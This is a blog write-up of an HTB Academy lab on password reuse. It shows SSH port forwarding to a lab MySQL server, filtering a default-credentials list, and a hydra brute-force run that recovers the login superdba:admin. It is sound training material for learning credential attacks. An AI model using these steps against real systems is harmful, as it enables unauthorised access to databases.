DEV Community

maz4l
maz4l

Posted on • Updated on

HTB Academy: Password Attacks Module – Password Reuse/Default Passwords

Image description

Challenge Overview:

The task is to find MySQL credentials using previously discovered user credentials. Below is the step-by-step approach I followed to solve this challenge.


Step 1: Establish an SSH Tunnel.Tab A

Using SSH, I forwarded the MySQL port (3306) to my local machine:



ssh -L 4444:localhost:3306 sam@10.129.xx.xxx


Enter fullscreen mode Exit fullscreen mode
  • Username: sam
  • Password: B@t********

Step 2: Download Default Credentials Cheat Sheet. Tab B

I fetched a default credentials cheat sheet that includes common MySQL credentials:



wget https://raw.githubusercontent.com/ihebski/DefaultCreds-cheat-sheet/main/DefaultCreds-Cheat-Sheet.csv


Enter fullscreen mode Exit fullscreen mode

Step 3: Filter for MySQL Credentials

Using grep, I extracted MySQL-specific credentials from the cheat sheet and saved them to a file for further testing:



cat DefaultCreds-Cheat-Sheet.csv 
grep -i 'mysql' DefaultCreds-Cheat-Sheet.csv > cred.list


Enter fullscreen mode Exit fullscreen mode

I then manually edited the cred.list file to keep the most promising credentials:



admin@example.com:admin
root:<blank>
root:root
superdba:admin
scrutremote:admin


Enter fullscreen mode Exit fullscreen mode

Step 4: Brute-Force Login Using Hydra

To automate the login attempts, I used hydra with the credentials file:



hydra -C cred.list mysql://localhost:4444


Enter fullscreen mode Exit fullscreen mode

Success!

After a few attempts, Hydra successfully found valid MySQL credentials:

  • Login: superdba
  • Password: admin


[4444][mysql] host: localhost login: superdba password: admin
1 of 1 target successfully completed, 1 valid password found


Enter fullscreen mode Exit fullscreen mode

Happy Hacking!

Top comments (0)